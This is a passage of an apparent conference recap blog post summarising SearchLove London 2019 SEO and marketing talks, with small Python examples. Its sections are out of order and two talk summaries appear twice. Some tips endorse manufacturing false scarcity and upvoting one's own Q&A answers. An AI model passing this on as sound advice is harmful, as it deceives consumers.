Luke Carthy discussed the importance of not always striving to drive more traffic, but making the most of the traffic you currently do have. More traffic does not necessarily equal more conversions! He explored different ways to identify opportunities using crawl software and custom extraction, and to use these insights to improve conversion rates on your website.
His top recommendations include:
Look at the internal search experience of users - do they get a ‘no results found’ page? What does this look like - does it provide a good user experience? Does it guide users to alternative products?
Custom extraction is an excellent way to mine websites for information (your own and especially competitors!)
Consider scraping product recommendations:
What products are competitor sites recommending? These are often based on dynamic algorithms, so provide a good insight into what products customers buy together
Also pay attention to the price of the recommended products vs. the main product - recommended items are often more expensive, to encourage users to spend more
Also consider scraping competitor sites for prices, review and stock
Are you cheaper than competitors?
Do competitors have popular products that you don’t have? What are their best and worst-performing products? Often category or search results pages are ordered by best-sellers, and you can take advantage of this by mining this information
To deepen your analysis, plugin other data such as log file data, Google Analytics, XML sitemaps and backlinks to try to understand how you can improve your current results, and to obtain comprehensive insights that you can share with the wider team
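As a toy version of the custom-extraction idea (the HTML structure is invented), pulling competitor product names and prices for comparison might look like this - in Screaming Frog the same thing would be a custom-extraction XPath or CSS rule rather than a regex:

```python
import re

# Snippet of hypothetical competitor product HTML (structure invented)
html = """
<div class="product"><span class="name">Trail Runner X</span>
  <span class="price">£74.99</span></div>
<div class="product"><span class="name">Road Racer 2</span>
  <span class="price">£59.00</span></div>
"""

# A regex stands in here for a crawler's custom-extraction rule
pattern = re.compile(
    r'class="name">([^<]+)</span>.*?class="price">£([\d.]+)', re.S
)

prices = {name: float(price) for name, price in pattern.findall(html)}
print(prices)
```

Run the same extraction against your own site and a competitor's, and a simple merge of the two dictionaries answers "are we cheaper?" product by product.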
SearchLove London 2019 - Luke Carthy - Finding Powerful CRO and UX Opportunities Using SEO Crawlers from Distilled
Andi Jarvis - ‘The Science of Persuasion’
Human psychology affects consumers’ buying behavior tremendously. Andi covered how we as SEOs can better understand these factors to influence our SEO strategy and improve conversions.
Scarcity: you can create the impression of scarcity even when it doesn’t exist, by creating scarcity of time to drive demand. An example of this is how Hotels.com creates a sense of urgency by including things like “Only 4 rooms left!” Test and learn with different time scales (hours, days, weeks or more) to see what works best for your product offering.
Authority: building authority helps people understand who they should trust. When you’ve got authority, you are more likely to persuade people. You can build authority simply by talking about yourself, and by labelling yourself as an authority in your industry.
Likeability: The reason that influencer marketing works is due to the principle of liking: we prefer to buy from people who we are attracted to and who we aspire to be. If we can envision ourselves using a product or service by seeing ourselves in its marketing, then we are more likely to convert.
Pretty Little Thing has started doing this by incorporating two models to model clothing, to increase the likelihood of users identifying with their models
Purpose: People are more likely to buy when they feel they are contributing to a cause - for example Pampers, which has a partnership with Unicef, so consumers feel like they are doing a good deed when they buy Pampers products. This is known as cause-based or purpose-based marketing.
Social proofing: It’s been known for a long time that people are influenced by the behaviour of others. In the early 1800s, theatres would pay people to clap at the right moments in a show, to encourage others to join in. Similarly today, if a brand has several endorsements from celebrities or users, people are more likely to purchase their products.
Reciprocation: Offering customers a free gift (even if small) can have a positive impact on re-purchase rates. Make sure though that you evolve what you do if you have a regular purchase cycle - offer customers different gifts so that they don’t know what to expect, otherwise the positive effect wears off.
SearchLove London 2019 - Andi Jarvis - The Science of Persuasion from Distilled
Heather Physioc - ‘Building a Discoverability Powerhouse: Lessons From Integrating Organic Search, Paid Search & Performance Content’
Organic search, paid search, and performance content all impact discoverability. Yet, in many organisations, these teams are siloed. Heather discussed tips for integrating and collaborating between teams to build a “discoverability powerhouse”.
There are definite obstacles to integrating marketing teams like paid, social, or organic.
Merging teams too completely can actually diminish agility. Depending on what marketing needs are at different times, allow for independence of teams when it’s necessary to get a job done.
Every team has their own processes for getting things done. Don’t try to overhaul everything at once. Talk with each other to see where integration makes the most sense.
There are also clear wins when you’re able to collaborate effectively.
When you’re in harmony with each team, you can more seamlessly find opportunities for discoverability. This can ultimately lead to up-sells or cross-sells.
By working together, we can share knowledge more deeply and have richer data. We can then leverage this to capture as much of the SERP as possible.
Cross-training teams can help build empathy and trust. When separate teams gain an understanding of how and why certain tasks (i.e. keyword research) are done, it can help everyone work better together and streamline processes.
SearchLove London 2019 - Heather Physioc - Building a Discoverability Powerhouse from Distilled
Robin Lord - ‘Excel? It Would Be Easier To Go To Jupyter’
Robin, a senior consultant here at Distilled, demonstrated the various shortcomings of Excel and showed an easier, repeatable, and more effective way to get things done - using Jupyter Notebooks and Python.
Below we outline Robin’s main points:
Excel and Google Sheets are very error-prone - especially if you’re dealing with larger data sets! If you need to process a lot of data, then you should consider using Jupyter Notebooks, as it can handle much bigger data sets (think: analysing backlinks, doing keyword research, log file analysis)
Jupyter Notebooks are reusable: if you create a Jupyter script to do any repeatable task (i.e. reporting or keyword research) then you can reuse it. This makes your life much easier because you don’t have to go back and dissect an old process.
Jupyter allows you to use Regex. This gives a huge advantage over Excel because it is far more efficient at accounting for misspellings - giving you, for example, a much better chance of accurately capturing branded search query permutations.
Jupyter allows you to write notes and keep every step in your process ordered. This means that your methodology is noted and the next time you perform this task, you remember exactly the steps you took. This is especially useful for when clients ask you questions about your work weeks or months down the line!
Finally - Jupyter notebooks allow us to get answers that we can’t get from Excel. We’re able to not only consider the data set from new angles, but we also have more time to go about other tasks, such as thinking about client strategy or improving other processes.
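To give a flavour of the regex point above, here is a hedged sketch (brand and misspellings invented for the example) that classifies branded queries in one pattern - something an Excel lookup of every permutation struggles to do:

```python
import re

# A handful of queries containing misspelled brand permutations
# (brand "Distilled" used purely as an example)
queries = [
    "distilled seo training",
    "distiled conference london",
    "dsitilled searchlove",
    "keyword research guide",
]

# One pattern tolerating common letter swaps and dropped letters,
# instead of an exhaustive list of every misspelling
branded = re.compile(r"d[is]{1,2}t[il]{2,3}ed", re.I)

labels = {q: bool(branded.search(q)) for q in queries}
print(labels)
```

The character-class quantifiers absorb transpositions ("dsitilled") and dropped letters ("distiled") that would each need their own row in a spreadsheet lookup.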
Robin has so many slides it breaks Slideshare. Instead, you can download his slides from Dropbox.
Jes Scholz - ‘Giving Robots An All Access Pass’
Jes Scholz uses the analogy of a nightclub to explain how Googlebot interacts with your website. The goal? To become part of the exclusive “Club Valid”. Her main points are outlined below:
As stated by John Mueller himself, “crawl budget is overrated - most sites never need to worry about this”. So instead of focusing on how much Google is crawling your site, you should be most concerned with how Google is crawling it
Status codes are not good or bad - there are right codes and wrong codes for different situations
In a similar vein, duplicate content is not “bad”, in fact, it’s entirely natural. You just need to make sure that you’re handling it correctly
JavaScript is your ticket to better UX, however, bear in mind that this often presents a host of SEO difficulties. Make sure that you don’t rely on the mobile-friendly testing tool to see if Google is able to crawl your JavaScript - this tool actually uses different software to Googlebot (this is a common misconception!) The URL inspection tool is a bit better for checking this, however, bear in mind it’s more patient than Googlebot when it comes to rendering JavaScript, so isn’t 100% accurate.
SearchLove London 2019 - Jes Scholtz - Giving Robots an All Access Pass from Distilled
Rand Fishkin - ‘The Search Landscape in 2019’
As the web evolves, it’s important to evaluate the areas you could invest in carefully. Rand explored the key changes affecting search marketers and how SEOs can take these changes into account when determining strategy.
Should you invest in voice search? It’s probably a bit too early. There is little difference in the results you get from a voice search vs. a manual search.
Both mobile and desktop are big - don’t neglect one at the expense of the other!
The zero-click search is where the biggest search growth is happening right now. It now accounts for about half (48.96% in the US) of all searches!
If you could benefit from answering zero-click searches, then you should prepare for that. You can determine whether you’d benefit by evaluating the value in ranking for a particular query without necessarily getting traffic.
With changes in Google search appearance recently, ads have become more seamless in the SERP. This has led to paid click-through-rate rising a lot. However, if history is correct, then it will probably slowly decline until the next big search change.
As Google’s algorithms evolve, you’ll likely receive huge ranking benefits from focusing on growing authority signals (E-A-T).
Check out Rand’s slides to see where you should be spending your time and money as the search landscape evolves.
SearchLove London 2019 - Rand Fishkin - The Search Landscape in 2019 from Distilled
Emily Potter - ‘Can Anything in SEO Be Proven? A Deep-Dive Into SEO Split-Testing’
Split testing SEO changes allow us to say with confidence whether or not a specific change hurts or helps organic traffic. Emily discusses various SEO split tests she’s run and potential reasons for their outcome.
The main levers for SEO tend to boil down to
1. Improving organic click-through-rate (CTR)
2. Improving organic rankings of current keywords
3. Ranking for new keywords
Split testing changes that we want to make to our site can help us to make business cases, rescue sessions, and gain a competitive advantage.
Determining which of the three levers causes a particular test to be positive or negative is challenging because since they all impact each other, the data is noisy. Measuring organic sessions relieves us of this noise.
Following “best practices” or what your competitors are doing is not always going to result in wins. Testing shows you what actually works for your site. For example, adding quantity of products in your titles or structured data for breadcrumbs might actually negatively impact your SEO, even if it seems like everyone else is doing so.
Check out Emily’s slides to see more split test case studies and learnings!
Lessons from another year in SEO A/B Testing - SearchLove London 2019 from Emily Potter
Jill Quick - ‘Segments: How To Get Juicy Insights & Avoid The Pips!’
In her excellent talk, Jill highlights how “average data gives you average insights”, and discusses the importance of segmenting your data to gain deeper insights into user behaviour. While analytics and segments are awesome, don’t become overwhelmed with the possibilities - focus on your strategy and work from there.
Jill’s other tips include:
Adding custom dimensions to forms on your website allows you to create more relevant and specific data segments
For example, if you have a website in the education sector, you can add custom dimensions to a form that asks people to fill in their profession. You can then create a segment where custom dimension = headteacher, and you can then analyse the behaviour of this specific group of people
Build segments that look at your best buyers (people who convert well) as well as your worst customers (those who spend barely any time on site and never convert). You can learn a lot about your ideal customer, as well as what you need to improve on your site, by doing this.
Use your segments to build retargeting lists - this will usually result in lower CPAs for paid search, helping your PPC budget go further
Don’t forget to use advanced segments (using sequences and conditions) to create granular segments that matter to your business
You can use segments in Google Data Studio, which is awesome! Just bear in mind that in Data Studio you can’t see if your segment data is sampled, so it’s best to go into the GA interface to check
If you want to hear more about Jill's session, she's written a post to supplement her slides.
Segments in Google Analytics from The Coloring In Department
Rory Truesdale - ‘Using The SERPs to Know Your Audience’
It can be easy to get lost in evaluating metrics like monthly search volume, but we often forget that for each query, there is a person with a very specific motivation and need. Rory discussed how we can utilise Google’s algorithmic re-writing of the SERP to help identify those motivations and more effectively optimise for search intent - the SERPs give us amazing insight into what customers want!
Google rewrites the SERP displayed meta description 84% of the time (it thinks it’s smarter than us!) However, we can use this rewrite data to our advantage.
The best ways to get SERP data are crawling the SERPs with Screaming Frog, the scraper API or Chrome extension, or “Thruuu” (a SERP analysis tool), and then using Jupyter Notebooks to analyse the results.
Scraping of SERPs, product reviews, comments, or reddit forums can be really powerful in that it will give you a data source that can reveal insight about what your customers want. Then you can optimise the content on your pages to appeal to them.
If you can get a better idea about what language and tone resonates with users, you can incorporate it into CTAs and content.
Check out Rory’s slides as well as the Jupyter notebook he uses to analyse SERP data.
SearchLove London 2019 - Rory Truesdale - Using the SERPs to Know Your Audience from Distilled
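As a hedged sketch of the kind of notebook analysis Rory describes, you can count the terms Google favours in its rewritten descriptions. (The descriptions below are invented; a real notebook would load thousands of scraped rows.)

```python
import re
from collections import Counter

# Hypothetical meta descriptions scraped from a SERP
serp_descriptions = [
    "Compare the best running shoes for beginners, tested by our experts.",
    "Find lightweight running shoes with free next-day delivery.",
    "Expert-tested running shoes for every budget and distance.",
]

stopwords = {"the", "for", "with", "and", "by", "our", "every"}
words = Counter(
    w
    for desc in serp_descriptions
    for w in re.findall(r"[a-z']+", desc.lower())
    if w not in stopwords
)
print(words.most_common(5))
```

Terms that keep surfacing across the rewritten snippets are a strong hint about the language that resonates for that query.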
Miracle Inameti Archibong - ‘The Complete Guide To Actionable Speed Audits: Getting Your Developer To Work With You’
It can be a huge challenge to get devs to implement our wishlist of SEO recommendations. Miracle discussed the practical steps to getting developers to take your recommendations seriously.
If you take some time to understand the Web Dev roles at your company, then it will help you better communicate your needs as an SEO and get things rolled out. You can do this by:
Learning the language that they’re using. Do some research into the terminology as well as possible limitations of your ask. This will make you more credible and you’re more likely to be taken seriously.
A team of developers may have different KPIs than you. It may be beneficial to use something like revenue as a way to get them on board with the change you want to make.
Try to make every ask more collaborative rather than instructive. For example, instead of simply presenting “insert this code,” try “here’s some example code, maybe we can incorporate x elements. What do you think?” A conversation may be the difference in effecting change.
Prioritising your requests in an easily readable way for web dev teams is always a good idea. It will give them the most information on what needs to get done in what timeline.
SearchLove London 2019 - Miracle Inameti-Archibong - The Complete Guide to Actionable Speed Audits from Distilled
Faisal Anderson - ‘Spying On Google: Using Log File Analysis To Reveal Invaluable SEO Insights’
Log files contain hugely valuable insight on how Googlebot and other crawlers behave on your site. Faisal uncovered why you should be looking at your logs as well as how to analyse them effectively to reveal big wins that you may have otherwise been unable to quantify.
Looking at log files is a great way to see the truest and freshest data on how Google is crawling your site. It’s most accurate because it’s the actual logs of how Google (and any other bot) is crawling your website.
Getting log file data can be tricky, so it’s helpful to ask devs about your hosting setup (if your server uses load balancing, the log files may be split between various hosts). You’ll want to get 6 months of data if you can.
The three main things to evaluate when you’re analysing log files:
Crawl behavior: look at most and least crawled URLs, look at crawl frequency by depth and internal links
Budget waste: find low value urls (faceted nav, query params, etc.) there are likely some subdirectories you want crawled more than others
Site health: look for inconsistent server responses
Using Jupyter to do log file analysis is great because it’s reusable and you’ll be able to use it again and again.
SearchLoveLondon 2019 - Faisal Anderson - Spying on Google: Using Log File Analysis to Reveal Invaluable SEO Insights from Distilled
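A minimal sketch of that kind of log analysis in Python (the log lines are invented, and a real analysis would stream a six-month file rather than a short list):

```python
import re
from collections import Counter

# Hypothetical combined-format access log lines
log_lines = [
    '66.249.66.1 - - [14/Oct/2019:10:00:01 +0000] "GET /category/shoes HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '66.249.66.1 - - [14/Oct/2019:10:00:05 +0000] "GET /category/shoes?colour=red HTTP/1.1" 200 5100 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '203.0.113.9 - - [14/Oct/2019:10:00:07 +0000] "GET /category/shoes HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

pattern = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Count Googlebot hits per URL - query-string URLs showing up here
# is exactly the kind of crawl-budget waste Faisal mentions
googlebot_hits = Counter()
for line in log_lines:
    if "Googlebot" not in line:
        continue  # in production, verify via reverse DNS, not just the UA string
    m = pattern.search(line)
    if m:
        googlebot_hits[m.group("path")] += 1

print(googlebot_hits.most_common())
```

From here it’s a short step to grouping paths by subdirectory or parameter to spot budget waste.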
Dr Pete Myers - ‘Scaling Keyword Research: More Isn’t Better’
Dr Pete Myers discussed how more is not better when it comes to keyword research! Ditch the thousands of keywords and instead focus on a smaller set of keywords that actually matter for you or your clients. Below are his top tips:
Pete has developed a simple metric called RankVol to help determine the importance of a keyword
RankVol = 1 / (rank x square root of volume)
Using this metric is better than sorting by search volume, as often the highest volume keywords that a site is appearing for are not the most relevant
Lots of data in keyword research can be irrelevant. Using John Lewis as an example:
9% of keywords John Lewis ranks for are mis-spellings
Almost 20% of keywords they rank for are very close variants (plural vs. singular, for example)
Dr Pete provides a short script in his deck to group keywords to help strip out noise in your data set
If sitelinks appear for your website, Google thinks you’re a brand
A new SERP feature (‘best of’ carousel) is appearing in the US, and will likely be rolled out into Europe soon
This feature takes you to a heavily paid SERP, with lots of ads (some well-disguised!)
If a keyword has a heavily paid SERP, you should probably not bother trying to rank for it, as the pay-off will be small
‘People also ask’ is on 90% of searches - be sure to try and take advantage of this SERP space
To summarise, perception is everything with keyword research - make sure you filter out the noise!
SearchLove London 2019 - Dr. Pete Meyers - Scaling Keyword Research: More Isn't Better from Distilled
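The RankVol calculation is simple to script. Here’s a sketch with invented rank and volume figures (how you act on the resulting ordering is, of course, up to your own analysis):

```python
from math import sqrt

# Dr Pete's RankVol: 1 / (rank * sqrt(volume))
# Keywords, ranks and volumes below are invented for illustration
keywords = [
    {"keyword": "sofas", "rank": 1, "volume": 90500},
    {"keyword": "john lewis sofas", "rank": 3, "volume": 2400},
    {"keyword": "grey corner sofa", "rank": 12, "volume": 1900},
]
for kw in keywords:
    kw["rankvol"] = 1 / (kw["rank"] * sqrt(kw["volume"]))

# Sort by RankVol instead of raw search volume
ranked = sorted(keywords, key=lambda k: k["rankvol"], reverse=True)
for kw in ranked:
    print(f"{kw['keyword']:<20} {kw['rankvol']:.6f}")
```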
Lindsay Wassell - ‘Managing Multinational & Multilingual SEO in Motion’
Lindsay covered the many challenges involved in handling migrations involving multiple international site variants. Her key points are highlighted below:
Ask your dev team to make sure it’s possible to implement hreflang via XML sitemaps or on-page; then if there are problems implementing one method, you have another as a fall-back option
When deciding site structure and where international sites should be located (sub-folder? Subdomain? ccTLD?) bear in mind that there are no one-size-fits all solutions. It may be best to have a mixture of solutions, depending on each market.
If you have hreflang relationship issues, Lindsay advises to use Google Sheets to manage hreflang mappings, in combination with a script that can automatically generate XML sitemaps (link provided in her deck)
In order to encourage more people in your organisation to understand the importance of SEO and to make it a priority, highlight statistics such as traffic levels and revenue coming from organic search
Also keep in mind that every department has a wish list when it comes to a migration! Be tactical and tack onto other people’s wishlists to get SEO items implemented
As a final tip - check redirects before going live, as often dev teams will say it’s under control, and then there can be problems at the last minute
SearchLove London 2019 - Lindsay Wassell - Managing Multinational & Multilingual SEO in Motion from Distilled
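A sketch of what such a generation script might produce - building hreflang `<url>` entries from a language-to-URL mapping. (The URLs and language codes are hypothetical; in Lindsay’s workflow the real mapping would live in the Google Sheet.)

```python
# Hypothetical hreflang mapping, one row of the Google Sheet
hreflang_map = {
    "en-gb": "https://example.com/uk/",
    "en-us": "https://example.com/us/",
    "de-de": "https://example.com/de/",
}

def url_entry(loc, alternates):
    # Each <url> lists every alternate, including a self-reference
    links = "\n".join(
        f'    <xhtml:link rel="alternate" hreflang="{lang}" href="{href}"/>'
        for lang, href in alternates.items()
    )
    return f"  <url>\n    <loc>{loc}</loc>\n{links}\n  </url>"

entries = "\n".join(url_entry(loc, hreflang_map) for loc in hreflang_map.values())
sitemap = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"\n'
    '        xmlns:xhtml="http://www.w3.org/1999/xhtml">\n'
    f"{entries}\n</urlset>"
)
print(sitemap)
```

Regenerating the XML sitemap from the sheet on every change keeps the hreflang relationships reciprocal without hand-editing.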
Stacey MacNaught - ‘Actioning Search Intent - What To Do With All That Data’
By analysing search intent, you can gain a ton of really insightful data. Stacey discussed how you can utilise all of this data to optimise your site for organic search and ultimately increase revenue and traffic.
Traditionally, search intent is categorised broadly as navigational, informational, and transactional. However, it’s often unclear where things are categorised because sometimes keywords are really ambiguous. Often you can break these categories down into more specific categories.
In terms of targeting keywords on your site, look out for opportunities where you may not be delivering the right content based on what query you’re targeting.
For example, if you’re targeting an informational keyword with a transactional result, you’re not going to rank. This can be an opportunity for you to create the kind of page that will rank for a select query. If the phrase is “best ballet shoes” and the results are informational pages, then you shouldn’t be serving a transactional result.
If you can be objective about the topic at hand and you have someone qualified to write that content, then you should definitely do it.
If your rankings drop but revenue is unaffected, it’s likely you’ve lost rankings on informational keywords
Don’t assume that users will come back of their own accord - work with PPC and get them to retarget to users who have read your content
Build out different audience lists according to the types of content or topics that users have been reading
Build out separate PPC campaigns for this so you can easily monitor results
Stacey saw CPA fall by 34% when she did this for a healthcare site
To generate content ideas, talk to the sales and customer service teams to find out what users are asking, then build content around it
You can also use Google Forms to survey previous customers to find out what drove their purchase
SearchLove London 2019 - Stacey MacNaught - Actioning Search Intent: What to Do with All That Data from Distilled
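A deliberately naive sketch of bucketing queries by intent modifier - the modifier lists are illustrative, not Stacey’s actual taxonomy, but they show why a transactional page shouldn’t target a phrase like “best ballet shoes”:

```python
# Illustrative modifier lists - a real taxonomy would be built from SERP analysis
INFORMATIONAL = ("best", "how to", "guide", "vs")
TRANSACTIONAL = ("buy", "cheap", "price", "sale")

def bucket(query):
    q = query.lower()
    if any(m in q for m in TRANSACTIONAL):
        return "transactional"
    if any(m in q for m in INFORMATIONAL):
        return "informational"
    return "ambiguous"  # check the live SERP for these

for q in ["best ballet shoes", "buy ballet shoes", "ballet shoes"]:
    print(q, "->", bucket(q))
```

For the ambiguous bucket, the results Google actually serves are the best tiebreaker.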
Will Critchlow - ‘Misunderstood Concepts at the Heart of SEO - Get An Edge By Understanding These Areas’
Most things in SEO can be boiled down to technical accessibility, relevance, quality, and authority. Or: can it be crawled, does it meet a keyword need, and is it trustworthy? However, some of the foundational elements of SEO are misunderstood.
Regarding crawlability, it’s important to understand how setting directives in robots.txt will impact your site if handled incorrectly.
Robots.txt directives do not cascade. For example, if you set a specific group of directives for Googlebot disallowing /example, that is the only group it will follow. Even if you specify elsewhere in the file that * (all user agents) is disallowed from /dont-crawl, Googlebot will only obey its own directive not to crawl /example and will still be able to crawl /dont-crawl.
The Google documentation, the robots.txt checker in GSC, and the open-source parser tend to disagree on what is allowed and disallowed, so you’ll need to do some testing to ensure that the directives you’re setting behave as you intended.
We often have a lot of intuition about how things like PageRank work, but too many of our recommendations are based on misconceptions about how authority flows
There are some huge changes coming to major browser cookie handling. The cookie window will be shorter, which means that a lot of traffic that’s currently classified as organic will be classified as direct. Understanding the language around the changes that are happening is, and will be, important
There are common misconceptions too about the meaning of ‘long tail keywords’
50% of Twitter respondents incorrectly think it means that there are many words in a query
40% understand the correct meaning, which is that they are keywords with low search volume
SearchLove London 2019 - Will Critchlow - Misunderstood Concepts at the Heart of SEO from Distilled
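Will’s non-cascading robots.txt point can be demonstrated with Python’s built-in parser, which applies the same most-specific-group rule for this simple case (the paths are illustrative):

```python
from urllib.robotparser import RobotFileParser

# The * group and the Googlebot group are evaluated independently:
# Googlebot obeys only its own group, not the * group
robots_txt = """\
User-agent: *
Disallow: /dont-crawl

User-agent: Googlebot
Disallow: /example
"""

rp = RobotFileParser()
rp.parse(robots_txt.splitlines())

print(rp.can_fetch("Googlebot", "https://example.com/dont-crawl"))  # True
print(rp.can_fetch("Googlebot", "https://example.com/example"))     # False
print(rp.can_fetch("Bingbot", "https://example.com/dont-crawl"))    # False
```

Edge cases differ between parsers, which is exactly why Will recommends testing rather than trusting intuition.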
That's it for our London conference for another year. But the good news is we are heading to San Diego in March where we'll be getting some sun, sea and search at SearchLove San Diego!
If you have any questions about our conferences please leave a comment below or come and say hello over on Twitter.
SearchLove London 2019: The Great Big Round Up
On 14th and 15th October, we made our annual visit to The Brewery in London for our UK edition of SearchLove. This year’s conference was our most successful yet, not only in terms of the number of folks attending but also with regard to the high calibre of speakers who joined us over the jam-packed two days to share their invaluable industry insights. 
Let the show begin! #searchlove #seo pic.twitter.com/zDIRbbX2KG
— Udo Leinhäuser (@u_leinhaeuser) October 14, 2019
This post is a quick-fire summary of the knowledge our speakers had to share, plus their slides & a few photos from across the conference. All sessions in their entirety will be available with a DistilledU membership in a couple of weeks' time. And don’t forget that if you feel you missed out this year, make sure you sign up to our mailing list to be the first in the know for next year’s conference! Are you ready? Let’s get started!
Marie Haynes - ‘Practical Tips For Improving E-A-T’
Google’s algorithms are increasingly considering E-A-T components (expertise, authority and trust) when evaluating sites. Marie shared why and how to improve E-A-T so that you have the best chance at winning in the current and future search landscape.
One of the most important things to focus on is the accuracy of the information on your site. This is especially important if your pages are primarily YMYL (‘your money or your life’, in other words, content that can affect someone’s health, safety, financial stability, etc.).
Google’s quality raters use the quality raters guidelines as their textbook. If you take a look at the guidelines, you can get a better idea about what Google is actually looking at when they’re evaluating E-A-T components. Try doing a CTRL+F for your industry to see what they suggest for your vertical.
There are some practical things you can do on your site to help Google understand that you’re trustworthy and authoritative:
Have contact information available.
If you’re eCommerce, ensure that your refund policy and customer service information is clearly accessible.
Make sure your site is secure (HTTPS)
Have correct grammar. How your page reads is important!
Make sure that the information on your site doesn’t contradict known facts or the scientific consensus. Cite all sources as necessary.
SearchLove London 2019 - Marie Haynes - Practical Tips for Improving E-A-T from Distilled
Sarah Gurbach - ‘Using Qualitative Data To Make Human-Centered Decisions’
SEOs have a huge amount of data to work with, but often, the data that gets overlooked is that which comes directly from the humans who are driving all of our data points.
By performing qualitative research in tandem with quantitative, we can get insights on the actual human wants, barriers, and confusions that drive our customers to make their decisions and move through the funnel.
Sarah’s steps to conducting qualitative research include:
Defining your objective. Write it as a question. Keep it specific, focused and simple.
Asking open-ended questions to customers to define the personas you should be targeting. Sarah recommends surveys of 10 questions to 5 customers that should only take around 20 minutes each. More than this will likely be redundant.
Actually observing our users to figure out what and how they’re searching and moving through the funnel.
You can then quantify this data by combining it with other data sources (i.e. PPC data, conversion data, etc.).
If you don’t have time to conduct surveys, then you can go to social media and ask a question!
Want more on questions you can ask your customers? Check out this resource from Sarah.
SearchLove London 2019 - Sarah Gurbach - Using Qualitative Data to Make Human-centered Decisions from Distilled
Greg Gifford - ‘Doc Brown’s Plutonium-Powered SEO Playbook’
Greg delivered an entertaining, informative and best of all highly actionable talk on local SEO. If you have physical locations for your business, you should not be neglecting your local SEO strategy! It’s important to remember that there is a different algorithm for local SEO compared to the traditional SERP, and therefore you need to approach local SEO slightly differently.
Greg’s key tips to nailing your local SEO strategy are as follows:
Links are weighted differently for local SEO! Make sure you acquire local links - quality, and whether these are follow or nofollow, matters far less than in the standard SERP. The key is to make sure your links are local - get your hands dirty with some old-school marketing and get out into your local community to build links from churches, businesses and community websites in your area.  
Content needs to actually be about your business and local area. If you can use your website copy for a site in another area, you’re doing it wrong. Also, make sure that your blog is a local destination - if your content is more localised than your competitors’, then you’ll be one step ahead. 
Citations are also important, but you only need a handful! Make sure you link to your website from places that customers will actually see, such as your Facebook, Twitter and other social profiles. Ensure your business information is accurate across platforms.
Reviews need to be strong across platforms - there’s no use having excellent reviews in Google My Business, and then bad reviews on TripAdvisor!
Google My Business is your new homepage, so make sure you give it some attention!
Bear in mind that users can not only ask questions but also answer them - make sure you create your own Q&A here and upvote your answers so that they appear at the top.
Also be aware that clicks from GMB are recorded as direct! If you use UTM tracking parameters, then you can update the tracking so that you can attribute it correctly to organic.
SearchLove London 2019 - Greg Gifford - Doc Brown's Plutonium-powered Local SEO Playbook from Distilled
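A quick sketch of building such a tagged GMB website link (the parameter values below are a common convention, not a Google requirement - use whatever fits your reporting):

```python
from urllib.parse import urlencode

# Tag the Google My Business website link so clicks are attributed
# to organic rather than direct (values are illustrative)
params = {
    "utm_source": "google",
    "utm_medium": "organic",
    "utm_campaign": "gmb-listing",
}
gmb_url = f"https://www.example.com/?{urlencode(params)}"
print(gmb_url)
```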
Luke Carthy - ‘Finding Powerful CRO and UX Opportunities Using SEO Crawlers’
Luke Carthy discussed the importance of not always striving to drive more traffic, but making the most of the traffic you currently do have. More traffic does not necessarily equal more conversions! He explored different ways to identify opportunities using crawl software and custom extraction, and to use these insights to improve conversion rates on your website.
His top recommendations include:
Look at the internal search experience of users - do they get a ‘no results found’ page? What does this look like - does it provide a good user experience? Does it guide users to alternative products?
Custom extraction is an excellent way to mine websites for information (your own and especially competitors!)
Consider scraping product recommendations:
What products are competitor sites recommending? These are often based on dynamic algorithms, so provide a good insight into what products customers buy together
Also pay attention to the price of the recommended products vs. the main product - recommended items are often more expensive, to encourage users to spend more
Also consider scraping competitor sites for prices, review and stock
Are you cheaper than competitors?
Do competitors have popular products that you don’t have? What are their best and worst-performing products? Often category or search results pages are ordered by best-sellers, and you can take advantage of this by mining this information
To deepen your analysis, plugin other data such as log file data, Google Analytics, XML sitemaps and backlinks to try to understand how you can improve your current results, and to obtain comprehensive insights that you can share with the wider team
SearchLove London 2019 - Luke Carthy - Finding Powerful CRO and UX Opportunities Using SEO Crawlers from Distilled
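A standard-library sketch of the custom-extraction idea - pulling recommended-product prices out of a competitor page and comparing them to the main product’s price, as per Luke’s point about recommendations nudging users to spend more. (The HTML snippet, class name and prices are all invented; a crawler’s custom extraction would do the fetching and XPath/CSS selection for you.)

```python
from html.parser import HTMLParser

# Hypothetical fragment of a competitor product page
snippet = """
<div class="recommended">
  <span class="price">£24.99</span>
  <span class="price">£39.99</span>
  <span class="price">£54.99</span>
</div>
"""

class PriceExtractor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.in_price = False
        self.prices = []

    def handle_starttag(self, tag, attrs):
        if tag == "span" and ("class", "price") in attrs:
            self.in_price = True

    def handle_data(self, data):
        if self.in_price:
            self.prices.append(float(data.strip().lstrip("£")))
            self.in_price = False

extractor = PriceExtractor()
extractor.feed(snippet)

main_product_price = 19.99  # hypothetical
avg_recommended = sum(extractor.prices) / len(extractor.prices)
print(f"Recommended items average £{avg_recommended:.2f} vs £{main_product_price:.2f}")
```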
Andi Jarvis - ‘The Science of Persuasion’
Human psychology affects consumers’ buying behavior tremendously. Andi covered how we as SEOs can better understand these factors to influence our SEO strategy and improve conversions.
Scarcity: you can create the impression of scarcity even when it doesn’t exist, by creating scarcity of time to drive demand. An example of this is how Hotels.com creates a sense of urgency by including things like “Only 4 rooms left!” Test and learn with different time scales (hours, days, weeks or more) to see what works best for your product offering.
Authority: building authority helps people understand who they should trust. When you’ve got authority, you are more likely to persuade people. You can build authority simply by talking about yourself, and by labelling yourself as an authority in your industry.
Likeability: The reason that influencer marketing works is due to the principle of liking: we prefer to buy from people who we are attracted to and who we aspire to be. If we can envision ourselves using a product or service by seeing ourselves in its marketing, then we are more likely to convert.
Pretty Little Thing has started doing this by incorporating two models to model clothing, to increase the likelihood of users identifying with their models
Purpose: People are more likely to buy when they feel they are contributing to a cause, for example, Pampers who has a partnership with Unicef, so consumers feel like they are doing a good deed when they buy Pampers products. This is known as cause-based or purpose-based marketing.
Social proofing: It’s been known for a long time that people are influenced by the behaviour of others. In the early 1800s, theatres would pay people to clap at the right moments in a show, to encourage others to join in. Similarly today, if a brand has several endorsements from celebrities or users, people are more likely to purchase their products.
Reciprocation: Offering customers a free gift (even if small) can have a positive impact on re-purchase rates. Make sure though that you evolve what you do if you have a regular purchase cycle - offer customers different gifts so that they don’t know what to expect, otherwise the positive effect wears off.
